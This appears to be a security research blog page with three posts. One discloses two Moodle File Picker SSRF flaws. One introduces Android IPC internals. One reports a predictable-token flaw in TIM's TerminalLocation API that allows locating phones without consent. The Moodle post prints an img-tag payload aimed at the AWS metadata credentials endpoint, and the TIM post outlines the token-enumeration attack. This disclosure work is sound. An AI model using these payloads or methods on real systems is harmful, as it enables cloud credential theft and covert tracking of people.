During the time dedicated to research we found 2 Server-Side Request Forgery on Moodle. The first one is a Blind SSRF already discovered in 2018 and tracked as CVE-2018-1042 without a proper patch, the other one is a fresh SSRF while parsing image tags inside the same component (File Picker). 

They are currently not patched and both working on the latest Moodle version because the Moodle Team, as they said from emails, leaves the responsibility to protect network interactions to system administrators. I personally do not agree with this statement because it leaves a dangerous vulnerability in a vanilla installation that can lead critical scenarios especially on cloud based hosting. So, in order to protect your Moodle installation, check out the Workaround section at the end of the article.

Let’s deppen these vulnerabilities starting from the impacted component, the File Picker.

File Picker

The File picker is a core Moodle component used to handle file uploads for multiple scopes. For example, it is used in the user’s profile picture handling or in ‘Private Files’, a dedicated area for any authenticated user. You can easily upload a file, but also retrieve an image from an arbitrary URL(!).

As it is used for multiple purposes, it is by default accessible to any authenticated user (also low privilege ones).

The fresh SSRF

The vulnerability resides on image parsing from an arbitrary URL (when an user choose to retrieve an image using the URL, as mentioned before).
If you request an HTML page, Moodle will fetch all ‘<img>’ tags inside it and ask you to choose which image you want to download. It extracts the src attribute for all image tags in the page and directly downloads the image, without further checks. That means that if we request the image from a server we control, we can request an HTML page with an arbitrary URL inside an image tag and Moodle will perform this arbitrary request for us. Then we can save the fake image (that contains the response for the SSRF) and display its result.

PoC

undefined

From the ‘URL Downloader’ action inside the File Picker, we can put a URL to our server that points to /index.html, that will contains the following payload:

<img src=http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance>

The request will catch our ‘src’ attribute as follow:

undefined

 

That will result, in the UI, in the following selection:

undefined

We can click on the box, and choose to download the fetched ‘image’:

undefined

In order to download the response, we have to provide a custom extension in the title name and customize the accepted_types[] parameter according to it (for example .arbitraryExtension)

undefined

 

The returned JSON response will contain the path to the result file (with the arbitrary request’s response), that we can download with a GET request:

undefined 

 

By automating this whole process with an exploit, we can now easily interact with local services.

For example, in a AWS EC2 instance we can interact with the Meta and User Data API internal endpoint at 169.254.169.254 (You can find more about this API at AWS Documentation).

undefined 

undefined

The old Blind SSRF

The unpatched Blind SSRF vulnerability (CVE-2018-1042) was already described here: exploit-db/exploits/47177. The patch did not applied any fix, so it is still exploitable and more suitable for internal port scans (as it is blind):

undefined

You can find both exploits in the Reference section.

Conclusion and Workaround

As we said, these SSRF are actually working on the latest Moodle release and their impact can be pretty critical for cloud based instances. Moodle has an open issue that plans to restrict most common restriction scenarios (MDL-56873) from 2016.

To fix these issues, from ‘Site Administration > Security > HTTP Security’ it is possible to restrict allowed hosts and ports (cURL blocked hosts and cURL allowed ports). You can customize these configurations based on your environment (such as restricting the loopback, internal network and allowing only HTTP ports to avoid port scans also to external sources).

Video

Timeline:

02/02/2020 - Moodle contacted
03/02/2020 - They received the request and handle the case
06/02/2020 - Blind SSRF vulnerability rejected (System Administrators should fix it)
11/03/2020 - We replied to some questions
25/03/2020 - Also the SSRF vulnerability is rejected (System Administrators should fix it)
25/03/2020 - Tried to emphasize the risk
30/03/2020 - Issues closed without a fix

(Alessandro Groppo)

Android IPC: Part 1 - Introduction

Introduction

In the last few months I was studying Android Internals in order to perform some security research in the future. I first tried to focus myself in its architecture and fundamentals components, starting from the bootloader stage to the Framework, in order to have an initial high level picture. Then, I focused on the Binder component for two reason

  • It is one of the main Android components, vital for its functionalities, as it is the IPC core.
  • In that period Google P0 discovered a 0day in the wild used in a chain to compromise the Android System. The Binder was impacted allowing LPE as root also from an isolated process (that means it is for sure a good attack vector)

During this studying process, I took a lot of messy notes, so after 1/2 months of not working anymore on Android, I took them back, put them in order, studied again (adding more messy notes) and decided to write this little series of articles. So, especially the second and the third sections contain theory concepts, high level functionalities and a lot of source code references. Parts of these articles can be considered as a ‘Code Walkthrough’, so having the actual Android Source Code (the online Android repository is enough) is highly suggested to understand the flow.
I didn’t want to repost other people's work, so this ‘code walkthrough’ is something different that honestly could help me when I was starting on it, so I hope it can help others too. It could not be perfect, so feel free to appoints something at <alessandro [at] hacktivesecurity.com> and I will of course consider them.
By the way, all references are at the bottom of each article.

In this first section, I will introduce some basic Android concepts that will be useful for next chapters. The second will deepen Binder interactions and the servicemanager. And last, but not least, the client and service IPC implementation and usage.

IPC Introduction

Inter-Process Communication is a necessary and indispensable feature for every Operating System in order to let processes communicate with each other. That means, if Process A needs to communicate with Process B (synchronize, share data, .. ), the OS must provide capabilities to do that.
We have multiple and different solutions that we can apply depending on the underlying OS, they can be through Pipes, Sockets, Shared Files, Shared Memory and more. These implementations are out of scope of this article’s series, so these are well-written references x

Linux: https://www.geeksforgeeks.org/inter-process-communication-ipc/
OSX: https://developer.apple.com/documentation/uikit/inter-process_communication
Windows: https://docs.microsoft.com/en-us/windows/win32/ipc/interprocess-communications

In order to go over the IPC implementation in Android, let’s make a short introduction to Android functionalities and some security aspects that will be useful during the reading.

Android and Linux

Starting from the classic. Android is a Linux kernel based distribution aimed for mobile devices. I cannot explain better than how was explained in ‘Android Internals’ by ‘Jonathan Levin’:

“Android's novelty arises from what it aims to provide - not just another Linux distribution - but a full software stack. The term "stack" implies several layers. Android provides not just the basic kernel and shell binaries, but also a self-contained GUI environment, and a rich set of frameworks. Coupled with a simple to use development language - Java - Android gives developers a true Rapid Application Development (RAD) environment, as they can draw on prewritten, well-tested code in the frameworks to access advanced functionality - such as Cameras, motion sensors, GUI Widgets and more - in a few lines of code”

One of the biggest differences with Linux is Bionic has its core runtime C library, instead of the standard GNU libC (Glibc). Bionic is lighter and more focused on Android’s needs. There are a lot of changes between them. Today we are focused on IPC, so the difference in our interest is the omission of the System-V IPC (message queues, shared memory and semaphores), that are omitted because Android chooses its own IPC mechanism, the Binder. The Binder is a kernel component, the core component of IPC, that enables different processes to communicate with each other using a client-server architecture. It’s the core theme of this series, so we will deppen in later chapters.

Dalvik and ART

Just to be aligned, let’s spend some words about the Dalvik Virtual Machine and ART, which are the core of Android.
If you know how Java works, you also know that in order to execute the code you need the JVM (Java Virtual Machine) that will execute the compiled bytecode, translating it to machine code.
Well, Dalvik follows the same concept, but it’s not the same!
The Dalvik VM runs a different type of bytecode, called DEX (Dalvik Executable) that is more optimized for efficiency in order to run faster on low performance hardware as it is for mobile devices. It is a Just In Time (JIT) compiler, that means that the code is compiled dynamically when it needs to be executed.
Android RunTime (ART) is used for the same purpose: translate bytecode to machine code and execute it.
By the way, it uses a different approach instead of JIT compiling , it uses Ahead Of Time (AOT) that translates the whole DEX into machine code (dex2oat) at installation time when the APK is installed or when the device is idle. That means that is much more faster at execution time, but also requires more physical space.

Dalvik is the predecessor of ART. ART has been introduced in Android 4.4 (KitKat) and started to use hybrid combination of AOT and JIT from Android 7.0 (Nougat), starting to follows a different compilation approach, synthesizing:

  1. The first few times the application runs, the app is executed through JIT compilation.
  2. When the device is idle or charging, a daemon performs compilation using AOT on frequently used code, based on a profile compilation generated from the first run.

You can find these profiles for each installed application inside /data/dalvik-cache/profiles/:

undefined

Android Framework and abstraction

Developers can access complex functionalities with few lines of code using pre-written code that resides in the Framework, delivered in packages that start with com.android.* . These packages can be for different scopes, such as location and application support (android.location and android.app) Network (android.net) and in our interest, IPC support and core OS services from android.os. (https://developer.android.com/reference/packages.html for more).
This is a high advantage from the Security Perspective. Usually, developers do not have to bother with native languages (avoiding common memory corruption issues) and instead use a well tested code, also when they need to perform advanced or low level functionalities (such as access an hardware peripheral) they can stay in an High Level, Memory Safe language.

Let’s take a quick example on how to interact with the WiFi component, supposing we need to retrieve the actual WiFi state:

import android.net.Wifi
// Get an handle to the WiFi Service
[..]
WifiManager Wifi_manager = (WifiManager) GetApplicationContext().getSystemService(Context.WIFI_SERVICE);
// Get the WifiState
Wifi_manager.getWifiState();
[...]

With these 2 lines of code we have completed our task:

  1. Get a handle to the WiFi service. The return result of getSystemService() is a generic Object (the handle to the service) that needs to be casted based on the desired service.
  2. From the retrieved manager, we can directly call the desired function, that will perform an IPC and return the result back.

That’s how Android abstract service interactions, enhancing security by simplifying application’s code.

By the way sometimes, due to performance reasons too, there is the necessity to run native code inside an application. This is performed using JNI, that permits to call native functions inside a shared library in the application context. This is pretty common for messaging applications (for example, whatsapp uses PJSP, a C library, for video conferences).

Java Native Interface

As we said, sometimes there is the necessity to use native code such as C/C++ from standard applications. This is permitted using the JNI (Java Native Interface) that lets Java call native functions without drastic differences. The native code is exported in shared libraries inside the lib/ folder (of the APK) where we have binaries compiled for multiple architectures (32/64 bit ARM, x86/x86-64 ), and the the underline system will choose the appropriate one (based on its hardware).

Let’s take an example with Whatsapp:

undefined

In this case, inside the lib/ folder there is only the armeabi-v7a folder. That’s because my test device is a 32 bit ARM (https://developer.android.com/ndk/guides/abis) and the system optimized physical space removing unused binaries compiled for other platforms.
These native functions are interesting from a security perspective because they can include memory corruption issues.
In order to track native calls, we can search through the Java code (decompiled) for native declarations:

undefined

That’s how a native function is declared, with the native keyword, and later on called as it is a normal Java function.
If you want to extract exported symbols from shared libraries, the nm utility can be come handy (nm -D * | grep <func_name> inside the specific ABI folder can be enough).

If you find an exploitable memory corruption in one application, you also have to consider the application sandbox. If you successfully compromise an application through a remote code execution, you are closed in a sandbox, where you can interact only with application’s related files and functionalities (and its declared android permissions). Of course, this can be part of a chain, with a foothold inside the system you have more attack surface in order to elevate privileges and compromise the system.

Application Sandbox

CVE-2019-11932 is a Whatsapp Remote Code execution caused by a memory corruption while handling GIF animations (here is a demo POC: https://www.youtube.com/watch?v=loCq8OTZEGI). This was a critical issue because, also if you are in a sandbox, you can access all whatsapp files (chat databases, backup, media , ..) and, as we know, nowadays whatsapp is the main messaging application.
As we said, Android is a Linux based OS and inherits a lot of its concepts. In this way, Android uses kernel-level Application Sandbox using the UID (Unique User ID). Every application on Android has its own UID and GUID for file permissions and running application process (UID starts from 1000). All applications have a dedicated workspace in /data/data/<app_name> created at the installation time where permissions permits only the application user to read and write in these files:

undefined

As you can see, only the user u0_a106 (10106, the UID for the WhatsApp application in my Droid) can access these files, meaning that any other application cannot read its content (only him and the root user).
For some applications (like browsers) there is an additional isolation that literally ‘isolates’ the application using a different UID. These IDs are referred in the Kernel source code as AID_ISOLATED_START (which is 99000) and AID_ISOLATED_END (99999) and limit service interactions. For example, the following snippet is part of the Android Kernel in order to obtain an handle to a service:

frameworks/native/cmd/servicemanager/service_manager.c

uint32_t do_find_service(const uint16_t *s, size_t len, uid_t uid, pid_t spid)
{
   //find_svc will retrieve a service info structure
   struct svcinfo *si = find_svc(s, len);
/.../
   //check if the requested service allow interaction from isolated apps
   if (!si->allow_isolated) {
       // If this service doesn't allow access from isolated processes,
       // then check the uid to see if it is isolated.
       uid_t appid = uid % AID_USER;
       if (appid >= AID_ISOLATED_START && appid <= AID_ISOLATED_END) {
           return 0;
       }
   }
/../
return si->handle

We will deepin in next chapters about the full process to obtain a service handle, but from this snippet you can see where the isolation check is performed. A check is done in the svcinfo structure (structure with service information such as the name, the isolation level and more) and if the target service is not allowed to be called from isolated processes (the caller UID is between AID_ISOLATED_START and AID_ISOLATED_END) the service handle is not returned.

For example, this is the chrome browser inside an isolated process:

undefined

You can note that the user id is 99008 (>99000), meaning it is an isolated application process.

Conclusion

In this first article, we introduced basic Android concepts and security aspects that will become handy for next chapters. In the next article, we are going to talk about the Binder, its transactions and the servicemanager.

References

http://newandroidbook.com/
https://source.android.com/devices/tech/dalvik
https://source.android.com/security/app-sandbox

(Alessandro Groppo)

A true story of mobile device geolocation

TL;DR

During the monthly research activity, in accordance with the relative Respnsible Disclosure program, we found and went in depth with an interesting security issue allowing geolocation of mobile devices using TIM, an Italian communication provider. A malicious user could find the TIM customers geo-position by forcing the approval mechanism to allow the geopositional tracking. By the way, thanks to TIM and its Responsible Disclosure program that allows several researchers to ethically disclose findings since 2018.

The research has been focused on TerminalLocation API service provided by TIM on its API Store.
TerminalLocation lets retrieve location of arbitrary devices by their phone numbers.
Below a service description provided by TIM:

“With TIM API - TerminalLocation track and monitor the location of mobile devices using geographic coordinates (latitude and longitude), date and time. Location information are valid for TIM customers.“

Let's see how it works.

Overview of the service

In order to use the API service, we needed to sign up and then create a test application to retrieve an API key.
Hence, you can make a GET request to /try/location/v1.1/<PHONE_NUMBER> including the API key in the request header. If this is the first request targeting the phone number, an SMS is sent asking for an authorization approval to notify the current position at any time.

 

undefined

In order to accept being geolocalized, the user has to click on the link in the message, which contains a base64 encoded user-token, and then click the confirmation button.

undefined

This action triggers a GET request to /tim/api/unsecured/consenso/<user-token>.
Everything seems ok, users have to agree in order to use this service. But things turned out for the best, almost...

Vulnerability

We started to collect multiple tokens and we were surprised about their low entropy.
The base64 string sent within the link hides a 24 character token with both static and at first glance random values. If we break up some tokens, obtained within the same day and with few hours of delay, we noticed the following schema:
XXXX AAAA YYYYYYYYYYYYYYY D
XXXX BBBB YYYYYYYYYYYYYYY E
XXXX CCCC YYYYYYYYYYYYYYY F
(next day)
XXXX GGGG ZZZZZZZZZZZZZZZ H

The schema may be decoded as follows:
First part: the 4 Xs are always the same, they may be a static value
Second part: the 4 As, Bs, Cs and Ds are random characters
Third part: the 15 Ys and Zs are constants changing day by day; it may be related to the current date
Fourth part: the E, F, G, H are random characters

We have confirmed that these tokens are not randomly generated and they have pretty easylogic behind.

The crucial test consisted to send requests for 2 tokens in a very short period of time (2 seconds):
XXXX XXDD YYYYYYYYYYYYYYY A
XXXX XXFF YYYYYYYYYYYYYYY B

Bingo!
They differ for just 3 characters and they are incremental!
At this point, we could easily guess with more confidence how tokens are generated: The first 4 characters are always the same, then 4 characters could be related to a timestamp, because they are consecutive, then 15 characters related to the current day and finally 1 random character in the last position.
With this insight we could create an enumeration tool, but another key point was reducing the character set:
A request with a syntactically correct token returns an error message containing “agreement not found":

undefined

With a malformed token (invalid length or invalid character set) it says Invalid parameters:

undefined

After few fuzzing requests we could determine that all characters were in a hexadecimal format, reducing a lot the enumeration (16 characters instead of 36 characters of all lowercase alphabet plus numbers).

Exploitation

The exploitation has been pretty easy:

  • Receive a token on our phone via SMS
  • Send the second token to the victim after few seconds
  • Deduce victim’s token from our one.
  • Localize the phone!

In order to automate this process, we wrote a few lines in python.
First, request two tokens with two seconds of delay (the first token to us and the second to the victim).
The timing is crucial because of its consecutive logic based on some sort of timestamp.

undefined

Attacker’s token:

undefined

Now we have the token generated before the victim’s one and we can easily predict it with an enumeration with 2 characters starting at the 6th position and one last character.

undefined

Thanks to multi-threading and, of course, low entropy, this enumeration took less than 1 second to retrieve the victim’s token.
With that token, we can now accept the agreement to the service with a PUT request to /tim/api/unsecured/consenso/<token>?operazione=APPROVA and geolocate the victim phone:

undefined

undefined

Responsible Disclosure:

14/08/2019 - Vulnerability found / Vendor contact
14/08/2019 - Automatic response
27/08/2019 - Vulnerability acknowledge
25/10/2019 - New fixed release planned at the end of November
03/12/2019 - Fix released

(Alessandro Groppo)

Home ← Older posts